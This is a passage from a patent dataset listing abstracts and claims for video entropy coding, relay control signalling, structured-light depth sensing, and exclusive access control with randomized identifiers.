decode, using the entropy decoder using the context, data from the encoded bitstream to obtain the element of the second group from the plurality of groups of elements. 2. The system of claim 1, wherein the elements of the block are quantized transform coefficients. 3. The system of claim 1, wherein the first group includes elements of a first row of the block and elements of a first column of the block. 4. The system of claim 1, wherein the first group includes elements forming a triangle in a corner of the block, and wherein the triangle includes elements of a first row of the block and elements of a first column of the block. 5. The system of claim 4, wherein the first group includes elements of a first row of the block that are outside of the triangle and elements of a first column of the block that are outside of the triangle. 6. The system of claim 1, wherein the second group includes all remaining elements of the block outside of the first group. 7. The system of claim 1, wherein the memory stores instructions executable by the processor to cause the system to:
determine, based on the category, a scan order for the second group from the plurality of groups of elements; and decode, using the entropy decoder, data from the encoded bitstream to obtain, using the scan order, elements of the second group from the plurality of groups of elements. 8. The system of claim 1, wherein the category is one of horizontal, vertical, diagonal-left, and diagonal-right. 9. The system of claim 1, wherein the instructions for determining the category based on the elements of the first group include instructions executable by the processor to cause the system to:
determine a first count of non-zero elements in a portion of the first group below a main diagonal of the block and at or above an anti-diagonal of the block; determine a second count of non-zero elements in a portion of the first group above the main diagonal of the block and at or above the anti-diagonal of the block; and determine the category based on the first count and the second count. 10. The system of claim 1, wherein the instructions for determining the category based on the elements of the first group include instructions executable by the processor to cause the system to:
determine a first sum of magnitudes of elements in a portion of the first group below a main diagonal of the block and at or above an anti-diagonal of the block; determine a second sum of magnitudes of elements in a portion of the first group above the main diagonal of the block and at or above the anti-diagonal of the block; and determine the category based on the first sum and the second sum. 11. The system of claim 1, wherein the instructions for determining the category based on the elements of the first group include instructions executable by the processor to cause the system to:
determine a first count of non-zero elements in a portion of a first row of the block; determine a second count of non-zero elements in a portion of a first column of the block; and responsive to the first count being zero and the second count being positive, determine the category to be a value corresponding to a vertical scan order. 12. The system of claim 1, wherein the instructions for determining the category based on the elements of the first group include instructions executable by the processor to cause the system to:
determine a first sum of magnitudes of elements in a portion of a first row of the block; determine a second sum of magnitudes of elements in a portion of a first column of the block; and responsive to the first sum being positive and the second sum being zero, determine the category to be a value corresponding to a horizontal scan order. 13. The system of claim 1, wherein the elements of the block each represent a sub-block of quantized transform coefficients. 14. A method for decoding video comprising:
partitioning a block of video data into a plurality of groups of elements; decoding, using an entropy decoder, data from an encoded bitstream to obtain elements of a first group from the plurality of groups of elements; determining a category based on the elements of the first group; based on the category, selecting a context for an element from a second group from the plurality of groups of elements; and decoding, using the entropy decoder using the context, data from the encoded bitstream to obtain the element of the second group from the plurality of groups of elements. 15. The method of claim 14, wherein the elements of the block are quantized transform coefficients, and further comprising:
displaying video that is generated based in part on decoded elements of the block. 16. A system for encoding video, comprising:
a memory; and a processor, wherein the memory stores instructions executable by the processor to cause the system to:
partition a block of video data into a plurality of groups of elements;
encode, using an entropy encoder, elements of a first group from the plurality of groups of elements;
determine a category based on the elements of the first group;
based on the category, select a context for an element from a second group from the plurality of groups of elements; and
encode, using the entropy encoder using the context, the element of the second group from the plurality of groups of elements. 17. The system of claim 16, wherein the elements of the block are quantized transform coefficients. 18. The system of claim 16, wherein the first group includes elements of a first row of the block and elements of a first column of the block. 19. The system of claim 16, wherein the first group includes elements forming a triangle in a corner of the block, and wherein the triangle includes elements of a first row of the block and elements of a first column of the block. 20. The system of claim 19, wherein the first group includes elements of a first row of the block that are outside of the triangle and elements of a first column of the block that are outside of the triangle. 21. The system of claim 16, wherein the second group includes all remaining elements of the block outside of the first group. 22. The system of claim 16, wherein the memory stores instructions executable by the processor to cause the system to:
determine, based on the category, a scan order for the second group from the plurality of groups of elements; and encode, using the entropy encoder using the scan order, elements of the second group from the plurality of groups of elements. | 2,400 |
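Claims 11 and 12 of the entropy-coding record above determine the scan-order category from counts of non-zero elements in the already-decoded first row and first column: an empty first row with a populated first column implies vertical energy, and vice versa. A minimal sketch of that decision rule follows; the function name, the category labels, and the choice to exclude the top-left (DC) position from both counts are illustrative assumptions, and the claims further subdivide the diagonal case (diagonal-left vs. diagonal-right, claim 8) in a way not reproduced here.

```python
def classify_scan_order(block):
    """Classify a block's scan-order category from its first group
    (first row and first column of quantized transform coefficients)."""
    # Non-zero counts over the first row and first column, excluding
    # the shared top-left coefficient (an assumption of this sketch).
    row_nonzero = sum(1 for v in block[0][1:] if v != 0)
    col_nonzero = sum(1 for row in block[1:] if row[0] != 0)
    if row_nonzero == 0 and col_nonzero > 0:
        return "vertical"    # claim 11: empty row, populated column
    if col_nonzero == 0 and row_nonzero > 0:
        return "horizontal"  # mirror case, cf. claim 12's sum-based variant
    return "diagonal"        # fallback; claims distinguish left/right diagonals
```

The decoder can evaluate this after decoding only the first group, then use the resulting category both to pick the scan order and to select entropy-coding contexts for the remaining elements.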
9,130 | 9,130 | 16,079,275 | 2,465 | An origination device transmits a “received data signal” to a signal forwarding device. The “received data signal” comprises a first set of data. The origination device also transmits at least one “received control signal” to the signal forwarding device and to a destination device. The at least one “received control signal” comprises a first set of control information and a second set of control information. The first and second sets of control information are both associated with the first set of data. The first set of control information contains instructions pertaining to the signal forwarding device processing the first set of data. The second set of control information contains instructions pertaining to the destination device processing the first set of data. The signal forwarding device transmits a “forwarded signal” to the destination device. The “forwarded signal” contains forwarded data, based on the first set of data. | 1. A method comprising:
receiving, at a signal forwarding device, at least one received data signal comprising a first set of data; receiving, at the signal forwarding device and at a destination device, at least one received control signal comprising a first set of control information and a second set of control information, the first set of control information associated with the first set of data and comprising instructions pertaining to the signal forwarding device processing the first set of data, the second set of control information associated with the first set of data and comprising instructions pertaining to the destination device processing the first set of data; and transmitting, from the signal forwarding device, a forwarded signal to the destination device, the forwarded signal comprising forwarded data, based at least partially on the first set of data. 2. The method of claim 1, wherein the at least one received control signal comprises one received control signal that comprises the first set of control information and the second set of control information. 3. The method of claim 1, wherein the at least one received control signal comprises a plurality of received control signals, the plurality of received control signals collectively comprising the first set of control information and the second set of control information. 4. The method of claim 1, further comprising:
providing, to the destination device, an expected time delay between reception of the at least one received control signal at the destination device and reception of the forwarded signal at the destination device. 5. The method of claim 1, wherein the first set of control information is transmitted using a first spatial vector, and the second set of control information is transmitted using a second spatial vector. 6. The method of claim 1, wherein the first set of control information is encoded at a first coding rate, and the second set of control information is encoded at a second coding rate. 7. The method of claim 1, wherein the first set of control information is modulated according to a first modulation technique, and the second set of control information is modulated according to a second modulation technique. 8. The method of claim 1, wherein the first set of control information comprises at least one of the following: carrier frequency, resource allocation, modulation/coding rate, multiple input multiple output (MIMO) scheme details, hybrid automatic repeat request (HARQ) related information, and origination and/or destination identifiers. 9. The method of claim 1, wherein the second set of control information comprises at least one of the following: carrier frequency, resource allocation, modulation/coding rate, multiple input multiple output (MIMO) scheme details, hybrid automatic repeat request (HARQ) related information, and origination and/or destination identifiers. 10. The method of claim 1, further comprising:
assigning at least one of: an association sequence number and an n-bit Downlink Control Information (DCI) indicator to identify which particular at least one received control signal corresponds to which particular forwarded signal. 11. A system comprising:
an origination device comprising a transmitter configured to transmit at least one received data signal comprising a first set of data; and a signal forwarding device comprising:
a receiver configured to receive the at least one received data signal, and
a transmitter configured to transmit a forwarded signal to a destination device, the forwarded signal comprising forwarded data, based at least partially on the first set of data,
the transmitter of the origination device further configured to transmit, to the signal forwarding device and to the destination device, at least one received control signal comprising a first set of control information and a second set of control information, the first set of control information associated with the first set of data and comprising instructions pertaining to the signal forwarding device processing the first set of data, the second set of control information associated with the first set of data and comprising instructions pertaining to the destination device processing the first set of data. 12. The system of claim 11, wherein the at least one received control signal comprises one received control signal that comprises the first set of control information and the second set of control information. 13. The system of claim 11, wherein the at least one received control signal comprises a plurality of received control signals, the plurality of received control signals collectively comprising the first set of control information and the second set of control information. 14. The system of claim 11, wherein the destination device further comprises a controller configured to determine an expected time delay between reception of the at least one received control signal at the destination device and reception of the forwarded signal at the destination device. 15. The system of claim 11, wherein the first set of control information is transmitted using a first spatial vector, and the second set of control information is transmitted using a second spatial vector. 16. The system of claim 11, wherein the first set of control information is encoded at a first coding rate, and the second set of control information is encoded at a second coding rate. 17. 
The system of claim 11, wherein the first set of control information is modulated according to a first modulation technique, and the second set of control information is modulated according to a second modulation technique. 18. The system of claim 11, wherein the first set of control information comprises at least one of the following: carrier frequency, resource allocation, modulation/coding rate, multiple input multiple output (MIMO) scheme details, hybrid automatic repeat request (HARQ) related information, and origination and/or destination identifiers. 19. The system of claim 11, wherein the second set of control information comprises at least one of the following: carrier frequency, resource allocation, modulation/coding rate, multiple input multiple output (MIMO) scheme details, hybrid automatic repeat request (HARQ) related information, and origination and/or destination identifiers. 20. The system of claim 11, wherein the origination device further comprises a controller configured to assign at least one of: an association sequence number and an n-bit Downlink Control Information (DCI) indicator to a particular at least one received control signal, the transmitter of the origination device further configured to transmit the assigned at least one of: an association sequence number and an n-bit DCI indicator to the signal forwarding device and to the destination device, the transmitter of the signal forwarding device further configured to include the assigned at least one of: an association sequence number and an n-bit DCI indicator in the forwarded signal. | An origination device transmits a “received data signal” to a signal forwarding device. The “received data signal” comprises a first set of data. The origination device also transmits at least one “received control signal” to the signal forwarding device and to a destination device. 
The at least one “received control signal” comprises a first set of control information and a second set of control information. The first and second sets of control information are both associated with the first set of data. The first set of control information contains instructions pertaining to the signal forwarding device processing the first set of data. The second set of control information contains instructions pertaining to the destination device processing the first set of data. The signal forwarding device transmits a “forwarded signal” to the destination device. The “forwarded signal” contains forwarded data, based on the first set of data. 1. A method comprising:
receiving, at a signal forwarding device, at least one received data signal comprising a first set of data; receiving, at the signal forwarding device and at a destination device, at least one received control signal comprising a first set of control information and a second set of control information, the first set of control information associated with the first set of data and comprising instructions pertaining to the signal forwarding device processing the first set of data, the second set of control information associated with the first set of data and comprising instructions pertaining to the destination device processing the first set of data; and transmitting, from the signal forwarding device, a forwarded signal to the destination device, the forwarded signal comprising forwarded data, based at least partially on the first set of data. 2. The method of claim 1, wherein the at least one received control signal comprises one received control signal that comprises the first set of control information and the second set of control information. 3. The method of claim 1, wherein the at least one received control signal comprises a plurality of received control signals, the plurality of received control signals collectively comprising the first set of control information and the second set of control information. 4. The method of claim 1, further comprising:
providing, to the destination device, an expected time delay between reception of the at least one received control signal at the destination device and reception of the forwarded signal at the destination device. 5. The method of claim 1, wherein the first set of control information is transmitted using a first spatial vector, and the second set of control information is transmitted using a second spatial vector. 6. The method of claim 1, wherein the first set of control information is encoded at a first coding rate, and the second set of control information is encoded at a second coding rate. 7. The method of claim 1, wherein the first set of control information is modulated according to a first modulation technique, and the second set of control information is modulated according to a second modulation technique. 8. The method of claim 1, wherein the first set of control information comprises at least one of the following: carrier frequency, resource allocation, modulation/coding rate, multiple input multiple output (MIMO) scheme details, hybrid automatic repeat request (HARQ) related information, and origination and/or destination identifiers. 9. The method of claim 1, wherein the second set of control information comprises at least one of the following: carrier frequency, resource allocation, modulation/coding rate, multiple input multiple output (MIMO) scheme details, hybrid automatic repeat request (HARQ) related information, and origination and/or destination identifiers. 10. The method of claim 1, further comprising:
assigning at least one of: an association sequence number and an n-bit Downlink Control Information (DCI) indicator to identify which particular at least one received control signal corresponds to which particular forwarded signal. 11. A system comprising:
an origination device comprising a transmitter configured to transmit at least one received data signal comprising a first set of data; and a signal forwarding device comprising:
a receiver configured to receive the at least one received data signal, and
a transmitter configured to transmit a forwarded signal to a destination device, the forwarded signal comprising forwarded data, based at least partially on the first set of data,
the transmitter of the origination device further configured to transmit, to the signal forwarding device and to the destination device, at least one received control signal comprising a first set of control information and a second set of control information, the first set of control information associated with the first set of data and comprising instructions pertaining to the signal forwarding device processing the first set of data, the second set of control information associated with the first set of data and comprising instructions pertaining to the destination device processing the first set of data. 12. The system of claim 11, wherein the at least one received control signal comprises one received control signal that comprises the first set of control information and the second set of control information. 13. The system of claim 11, wherein the at least one received control signal comprises a plurality of received control signals, the plurality of received control signals collectively comprising the first set of control information and the second set of control information. 14. The system of claim 11, wherein the destination device further comprises a controller configured to determine an expected time delay between reception of the at least one received control signal at the destination device and reception of the forwarded signal at the destination device. 15. The system of claim 11, wherein the first set of control information is transmitted using a first spatial vector, and the second set of control information is transmitted using a second spatial vector. 16. The system of claim 11, wherein the first set of control information is encoded at a first coding rate, and the second set of control information is encoded at a second coding rate. 17. 
The system of claim 11, wherein the first set of control information is modulated according to a first modulation technique, and the second set of control information is modulated according to a second modulation technique. 18. The system of claim 11, wherein the first set of control information comprises at least one of the following: carrier frequency, resource allocation, modulation/coding rate, multiple input multiple output (MIMO) scheme details, hybrid automatic repeat request (HARQ) related information, and origination and/or destination identifiers. 19. The system of claim 11, wherein the second set of control information comprises at least one of the following: carrier frequency, resource allocation, modulation/coding rate, multiple input multiple output (MIMO) scheme details, hybrid automatic repeat request (HARQ) related information, and origination and/or destination identifiers. 20. The system of claim 11, wherein the origination device further comprises a controller configured to assign at least one of: an association sequence number and an n-bit Downlink Control Information (DCI) indicator to a particular at least one received control signal, the transmitter of the origination device further configured to transmit the assigned at least one of: an association sequence number and an n-bit DCI indicator to the signal forwarding device and to the destination device, the transmitter of the signal forwarding device further configured to include the assigned at least one of: an association sequence number and an n-bit DCI indicator in the forwarded signal. | 2,400 |
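The claims above describe a relay scheme in which one control transmission carries two sets of instructions: one consumed by the signal forwarding device and one consumed by the destination device, matched to the data via an association sequence number (claims 10 and 20). Below is a minimal Python sketch of that flow. It is an illustration only: the class names, dict-based control fields, and the use of byte repetition as a stand-in for the unspecified coding/modulation are all assumptions, not details from the patent.

```python
from dataclasses import dataclass

@dataclass
class ControlSignal:
    seq: int          # association sequence number (hypothetical field, per claim 10)
    relay_info: dict  # first set: instructions for the signal forwarding device
    dest_info: dict   # second set: instructions for the destination device

@dataclass
class DataSignal:
    seq: int
    payload: bytes

class SignalForwardingDevice:
    """Relay that processes data according to the first set of control information."""
    def __init__(self):
        self.controls = {}
    def receive_control(self, ctrl: ControlSignal) -> None:
        self.controls[ctrl.seq] = ctrl
    def forward(self, data: DataSignal) -> DataSignal:
        ctrl = self.controls[data.seq]  # match control to data via the sequence number
        # Repetition coding stands in for whatever re-coding the relay applies.
        coded = data.payload * ctrl.relay_info.get("repeat", 1)
        return DataSignal(seq=data.seq, payload=coded)

class DestinationDevice:
    """Decodes the forwarded signal using the second set of control information."""
    def __init__(self):
        self.controls = {}
    def receive_control(self, ctrl: ControlSignal) -> None:
        self.controls[ctrl.seq] = ctrl
    def receive_forwarded(self, fwd: DataSignal) -> bytes:
        ctrl = self.controls[fwd.seq]
        n = ctrl.dest_info.get("repeat", 1)
        return fwd.payload[: len(fwd.payload) // n]  # undo the repetition

ctrl = ControlSignal(seq=7, relay_info={"repeat": 2}, dest_info={"repeat": 2})
relay, dest = SignalForwardingDevice(), DestinationDevice()
relay.receive_control(ctrl)  # the control signal is received at the relay...
dest.receive_control(ctrl)   # ...and, as claim 1 requires, at the destination too
fwd = relay.forward(DataSignal(seq=7, payload=b"hi"))
assert dest.receive_forwarded(fwd) == b"hi"
```

Note how the destination never needs the relay's instructions: each device looks up only the control set addressed to it, keyed by the shared sequence number.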
9,131 | 9,131 | 13,723,891 | 2,482 | A method and device are provided that compensate for different reflectivity/absorption coefficients of objects in a scene/object when performing active depth sensing using structured light. A receiver sensor captures an image of a scene onto which a code mask is projected. One or more parameters are ascertained from the captured image. Then a light source power for a projecting light source is dynamically adjusted according to the one or more parameters to improve decoding of the code mask in a subsequently captured image. Depth information for the scene may then be ascertained from the captured image based on the code mask. In one example, the light source power is fixed at a particular illumination while an exposure time for the receiver sensor is adjusted. In another example, an exposure time for the receiver sensor is maintained/kept at a fixed value while the light source power is adjusted. | 1. A device adapted to compensate for differences in surface reflectivity in an active depth sensing system using structured light, comprising:
a receiver sensor for capturing an image of a scene onto which a code mask is projected; a processing circuit adapted to:
ascertain one or more parameters from the captured image; and
dynamically adjust a light source power for a projecting light source according to the one or more parameters to improve decoding of the code mask in a subsequently captured image. 2. The device of claim 1, wherein the processing circuit is further adapted to:
ascertain depth information for the scene in the captured image based on the code mask. 3. The device of claim 1, wherein the processing circuit is further adapted to:
fix the light source power at a particular illumination while an exposure time for the receiver sensor is adjusted. 4. The device of claim 1, wherein the processing circuit is further adapted to:
maintain an exposure time for the receiver sensor at a fixed value while the light source power is adjusted. 5. The device of claim 1, wherein the one or more parameters are correlated to regions within the captured image based on the code mask. 6. The device of claim 1, wherein the projecting light source includes a plurality of light elements, and dynamically adjusting the light source power for the projecting light source includes individually controlling the light source power for each of the light elements based on the corresponding one or more parameters. 7. The device of claim 6, wherein the receiver sensor is further adapted to:
capture a new image of the scene onto which the code mask is projected, wherein the new image is light compensated on a region-by-region basis due to the operation of the individually adjusted plurality of light elements. 8. The device of claim 1, wherein the receiver sensor includes a plurality of individually controlled sensor shutters, and the processing circuit is further adapted to individually control the plurality of sensor shutters based on the corresponding one or more parameters to adjust the light captured by the receiver sensor. 9. The device of claim 8, wherein the sensor shutters are controlled to either reduce or increase the light that passes through them to compensate for too much or too little light in a given region as indicated by the one or more parameters. 10. The device of claim 8, wherein the receiver sensor is further adapted to:
capture a new image of the scene onto which the code mask is projected, wherein the new image is light compensated on a region-by-region basis due to the operation of the individually adjusted plurality of sensor shutters. 11. A method to compensate for differences in surface reflectivity in an active depth sensing system using structured light, comprising:
capturing, at a receiver sensor, an image of a scene onto which a code mask is projected; ascertaining, at a processing circuit, one or more parameters from the captured image; and dynamically adjusting a light source power for a projecting light source according to the one or more parameters to improve decoding of the code mask in a subsequently captured image. 12. The method of claim 11, further comprising:
ascertaining depth information for the scene in the captured image based on the code mask. 13. The method of claim 11, further comprising:
fixing the light source power at a particular illumination while an exposure time for the receiver sensor is adjusted. 14. The method of claim 11, further comprising:
maintaining an exposure time for the receiver sensor at a fixed value while the light source power is adjusted. 15. The method of claim 11, wherein the one or more parameters are correlated to regions within the captured image based on the code mask. 16. The method of claim 11, wherein the projecting light source includes a plurality of light elements, and dynamically adjusting the light source power for the projecting light source includes individually controlling the light source power for each of the light elements based on the corresponding one or more parameters. 17. The method of claim 16, further comprising:
capturing a new image of the scene onto which the code mask is projected, wherein the new image is light compensated on a region-by-region basis due to the operation of the individually adjusted plurality of light elements. 18. The method of claim 11, wherein the receiver sensor includes a plurality of individually controlled sensor shutters, and further comprising:
individually controlling the plurality of sensor shutters based on the corresponding one or more parameters to adjust the light captured by the receiver sensor. 19. The method of claim 18, further comprising:
controlling the sensor shutters to either reduce or increase the light that passes through them to compensate for too much or too little light in a given region as indicated by the one or more parameters. 20. The method of claim 18, further comprising:
capturing a new image of the scene onto which the code mask is projected, wherein the new image is light compensated on a region-by-region basis due to the operation of the individually adjusted plurality of sensor shutters. 21. A device adapted to compensate for differences in surface reflectivity in an active depth sensing system using structured light, comprising:
means for capturing, at a receiver sensor, an image of a scene onto which a code mask is projected; means for ascertaining, at a processing circuit, one or more parameters from the captured image; and means for dynamically adjusting a light source power for a projecting light source according to the one or more parameters to improve decoding of the code mask in a subsequently captured image. 22. The device of claim 21, further comprising:
means for ascertaining depth information for the scene in the captured image based on the code mask. 23. The device of claim 21, further comprising:
means for fixing the light source power at a particular illumination while an exposure time for the receiver sensor is adjusted. 24. The device of claim 21, further comprising:
means for maintaining an exposure time for the receiver sensor at a fixed value while the light source power is adjusted. 25. The device of claim 21, wherein the one or more parameters are correlated to regions within the captured image based on the code mask. 26. The device of claim 21, wherein the projecting light source includes a plurality of light elements, and the means for dynamically adjusting the light source power for the projecting light source includes means for individually controlling the light source power for each of the light elements based on the corresponding one or more parameters. 27. The device of claim 26, further comprising:
means for capturing a new image of the scene onto which the code mask is projected, wherein the new image is light compensated on a region-by-region basis due to the operation of the individually adjusted plurality of light elements. 28. The device of claim 21, wherein the receiver sensor includes a plurality of individually controlled sensor shutters, and further comprising:
means for individually controlling the plurality of sensor shutters based on the corresponding one or more parameters to adjust the light captured by the receiver sensor. 29. The device of claim 28, further comprising:
means for controlling the sensor shutters to either reduce or increase the light that passes through them to compensate for too much or too little light in a given region as indicated by the one or more parameters. 30. The device of claim 28, further comprising:
means for capturing a new image of the scene onto which the code mask is projected, wherein the new image is light compensated on a region-by-region basis due to the operation of the individually adjusted plurality of sensor shutters. 31. A processor-readable storage medium having one or more instructions to compensate for differences in surface reflectivity in an active depth sensing system using structured light, which when executed by one or more processors causes the one or more processors to:
capture, at a receiver sensor, an image of a scene onto which a code mask is projected; ascertain one or more parameters from the captured image; and dynamically adjust a light source power for a projecting light source according to the one or more parameters to improve decoding of the code mask in a subsequently captured image. 32. The processor-readable storage medium of claim 31 having one or more instructions which when executed by one or more processors causes the one or more processors to:
ascertain depth information for the scene in the captured image based on the code mask. 33. The processor-readable storage medium of claim 31 having one or more instructions which when executed by one or more processors causes the one or more processors to:
fix the light source power at a particular illumination while an exposure time for the receiver sensor is adjusted. 34. The processor-readable storage medium of claim 31 having one or more instructions which when executed by one or more processors causes the one or more processors to:
maintain an exposure time for the receiver sensor at a fixed value while the light source power is adjusted. 35. The processor-readable storage medium of claim 31, wherein the one or more parameters are correlated to regions within the captured image based on the code mask. 36. The processor-readable storage medium of claim 31, wherein the projecting light source includes a plurality of light elements, and further having one or more instructions which when executed by one or more processors causes the one or more processors to:
dynamically adjust the light source power for the projecting light source by individually controlling the light source power for each of the light elements based on the corresponding one or more parameters. 37. The processor-readable storage medium of claim 36 having one or more instructions which when executed by one or more processors causes the one or more processors to:
capture a new image of the scene onto which the code mask is projected, wherein the new image is light compensated on a region-by-region basis due to the operation of the individually adjusted plurality of light elements. 38. The processor-readable storage medium of claim 36, wherein the receiver sensor includes a plurality of individually controlled sensor shutters, and further having one or more instructions which when executed by one or more processors causes the one or more processors to:
individually control the plurality sensor shutters based on the corresponding one or more parameters to adjust the light captured by the receiver sensor. 39. The processor-readable storage medium of claim 38 having one or more instructions which when executed by one or more processors causes the one or more processors to:
control the sensor shutters to either reduce or increase the light that passes through them to compensate for too much or too little light in a given region as indicated by the one or more parameters. 40. The processor-readable storage medium of claim 38 having one or more instructions which when executed by one or more processors causes the one or more processors to:
capture a new image of the scene onto which the code mask is projected, wherein the new image is light compensated on a region-by-region basis due to the operation of the individually adjusted plurality of sensor shutters. | 2,400
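Claims 1-6 of record 9,131 describe a feedback loop: capture an image of the projected code mask, ascertain per-region parameters, then individually adjust each light element's power (while the exposure time stays fixed, per claim 4). The sketch below is one plausible reading of that loop, assuming the "parameters" are per-region mean brightnesses and a proportional adjustment toward a target level of 128; the target, gain, and all function names are assumptions for illustration, not details from the patent.

```python
import numpy as np

TARGET = 128.0  # assumed brightness target for reliable code-mask decoding

def region_parameters(image, grid=(2, 2)):
    """Split the captured image into a grid of regions; return each region's mean."""
    h, w = image.shape
    gh, gw = grid
    return np.array([
        [image[r*h//gh:(r+1)*h//gh, c*w//gw:(c+1)*w//gw].mean()
         for c in range(gw)]
        for r in range(gh)
    ])

def adjust_powers(powers, params, gain=1.0):
    """Scale each light element's power toward the brightness target,
    keeping the receiver's exposure time fixed (cf. claim 4)."""
    scale = TARGET / np.clip(params, 1.0, None)  # avoid division by zero
    return np.clip(powers * (1 + gain * (scale - 1)), 0.0, 1.0)

powers = np.full((2, 2), 0.5)                        # one light element per region
captured = np.array([[64.0, 128.0], [255.0, 32.0]])  # stand-in per-region levels
frame = np.kron(captured, np.ones((8, 8)))           # expand into a 16x16 "image"
params = region_parameters(frame)
powers = adjust_powers(powers, params)
# Dim regions (means 64 and 32) get more power; the saturated region gets less.
assert powers[1][0] < 0.5 < powers[0][0]
```

A subsequent capture under the new powers would then be re-evaluated the same way, which is how the "subsequently captured image" of claim 1 closes the loop.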
9,132 | 9,132 | 15,122,268 | 2,438 | Provided are an information processing device, information processing method, and program that enable exclusive control of access from each of a plurality of access sources, even in a communication environment based on a standard that assumes one-to-one communication, the information processing device including: an acquisition unit configured to acquire identification information at least a part of which includes randomized information from an external device; and a control unit configured to set only communication data associated with the acquired identification information out of communication data transmitted from the external device as a processing target exclusively. | 1. An information processing device comprising:
an acquisition unit configured to acquire identification information at least a part of which includes randomized information from an external device; and a control unit configured to set only communication data associated with the acquired identification information out of communication data transmitted from the external device as a processing target exclusively. 2. The information processing device according to claim 1, wherein, based on an instruction from the external device that is an acquisition source of the identification information, the control unit terminates exclusive control in which only the communication data associated with the acquired identification information is set as a processing target exclusively. 3. The information processing device according to claim 2, wherein the control unit continues the exclusive control when control information indicating continuation of the exclusive control is associated with the communication data associated with the identification information. 4. The information processing device according to claim 1, wherein, when a period in which the communication data associated with the acquired identification information is not received from the external device is equal to or longer than a period decided in advance, the control unit terminates exclusive control in which only the communication data associated with the identification information is set as a processing target exclusively. 5. The information processing device according to claim 1, wherein, after completion of a process based on the communication data associated with the acquired identification information, the control unit terminates exclusive control in which only the communication data associated with the identification information is set as a processing target exclusively. 6. 
The information processing device according to claim 1, wherein, after completion of exclusive control in which only the communication data associated with the identification information is set as a processing target exclusively, the control unit discards the identification information. 7. The information processing device according to claim 1, wherein, based on an instruction from the external device that is an acquisition source of the identification information, the control unit starts exclusive control in which only the communication data associated with the acquired identification information is set as a processing target exclusively. 8. The information processing device according to claim 1, wherein, when communication data that is not associated with the identification information is acquired during exclusive control in which only the communication data associated with the acquired identification information is set as a processing target exclusively, the control unit discards the communication data that is not associated with the identification information. 9. The information processing device according to claim 1, wherein, when other identification information that is different from the identification information is acquired during exclusive control in which only the communication data associated with the acquired identification information is set as a processing target exclusively, the control unit discards the other identification information. 10. The information processing device according to claim 1, wherein
the acquisition unit acquires second identification information that is different from first identification information acquired from the external device as the identification information, and the control unit transmits a result of a process based on the communication data associated with the first identification information to the external device in association with the second identification information. 11. The information processing device according to claim 10, comprising:
a generation unit configured to generate the second identification information based on the first identification information, wherein the acquisition unit acquires the second identification information generated by the generation unit. 12. The information processing device according to claim 10, wherein the acquisition unit acquires the second identification information from the external device that is an acquisition source of the first identification information. 13. The information processing device according to claim 10, wherein, when communication data that is not associated with other first identification information that is different from the first identification information is acquired during exclusive control in which only the communication data associated with the acquired first identification information is set as a processing target exclusively, the control unit notifies the external device that is a transmission source of the communication data of information indicating that the communication data is not set as a processing target in association with the second identification information corresponding to the other first identification information. 14. The information processing device according to claim 1, wherein
the acquisition unit acquires authentication information associated with the identification information from the external device, and when authentication succeeds based on the authentication information, the control unit recognizes a transmission source of the communication data associated with the identification information as a transmission source for which authentication has been performed. 15. The information processing device according to claim 1, wherein
the acquisition unit acquires each of data fragments obtained by dividing the communication data associated with the identification information into the data fragments, and the control unit continues exclusive control in which only the communication data associated with the acquired identification information is set as a processing target exclusively until at least acquisition of the series of data fragments is completed. 16. The information processing device according to claim 15, wherein the control unit recognizes the completion of the acquisition of the series of data fragments based on control information for identifying the data fragments associated with the data fragments. 17. The information processing device according to claim 15, wherein
the acquisition unit acquires control information for identifying the communication data associated with the data fragments, and the control unit recognizes that the data fragments are data fragments constituting the communication data based on the acquired control information for identifying the communication data. 18. The information processing device according to claim 1, comprising:
an informing unit configured to perform informing of a process result based on the communication data associated with the acquired identification information. 19. An information processing device comprising:
a generation unit configured to generate identification information at least a part of which includes randomized information; and a control unit configured to notify an external device of the generated identification information, and transmit communication data to the external device by associating the identification information with the communication data. 20. The information processing device according to claim 19, wherein
based on first identification information generated as the identification information, the generation unit generates second identification information that is different from the first identification information, and the control unit notifies the external device of the generated first identification information, transmits the communication data to the external device by associating the first identification information with the communication data, and sets only a response associated with the second identification information out of responses transmitted from the external device as a processing target. 21. The information processing device according to claim 19, wherein
the generation unit generates first identification information and second identification information that are different from each other as the identification information, and the control unit notifies the external device of the generated first identification information and second identification information, transmits the communication data to the external device by associating the first identification information with the communication data, and sets only a response associated with the second identification information out of responses transmitted from the external device as a processing target. 22. An information processing method comprising:
acquiring identification information at least a part of which includes randomized information from an external device; and setting, by a processor, only communication data associated with the acquired identification information out of communication data transmitted from the external device as a processing target exclusively. 23. An information processing method comprising:
generating identification information at least a part of which includes randomized information; and notifying, by a processor, an external device of the generated identification information, and transmitting communication data to the external device by associating the identification information with the communication data. 24. A program causing a computer to execute:
acquiring identification information at least a part of which includes randomized information from an external device; and setting only communication data associated with the acquired identification information out of communication data transmitted from the external device as a processing target exclusively. 25. A program causing a computer to execute:
generating identification information at least a part of which includes randomized information; and notifying an external device of the generated identification information, and transmitting communication data to the external device by associating the identification information with the communication data. | There is provided an information processing device, information processing method, and program that enable access from each of a plurality of access sources to be exclusively controlled even in a communication environment based on a standard in which one-to-one communication is assumed, the information processing device including: an acquisition unit configured to acquire identification information at least a part of which includes randomized information from an external device; and a control unit configured to set only communication data associated with the acquired identification information out of communication data transmitted from the external device as a processing target exclusively. 1. An information processing device comprising:
an acquisition unit configured to acquire identification information at least a part of which includes randomized information from an external device; and a control unit configured to set only communication data associated with the acquired identification information out of communication data transmitted from the external device as a processing target exclusively. 2. The information processing device according to claim 1, wherein, based on an instruction from the external device that is an acquisition source of the identification information, the control unit terminates exclusive control in which only the communication data associated with the acquired identification information is set as a processing target exclusively. 3. The information processing device according to claim 2, wherein the control unit continues the exclusive control when control information indicating continuation of the exclusive control is associated with the communication data associated with the identification information. 4. The information processing device according to claim 1, wherein, when a period in which the communication data associated with the acquired identification information is not received from the external device is equal to or longer than a period decided in advance, the control unit terminates exclusive control in which only the communication data associated with the identification information is set as a processing target exclusively. 5. The information processing device according to claim 1, wherein, after completion of a process based on the communication data associated with the acquired identification information, the control unit terminates exclusive control in which only the communication data associated with the identification information is set as a processing target exclusively. 6. 
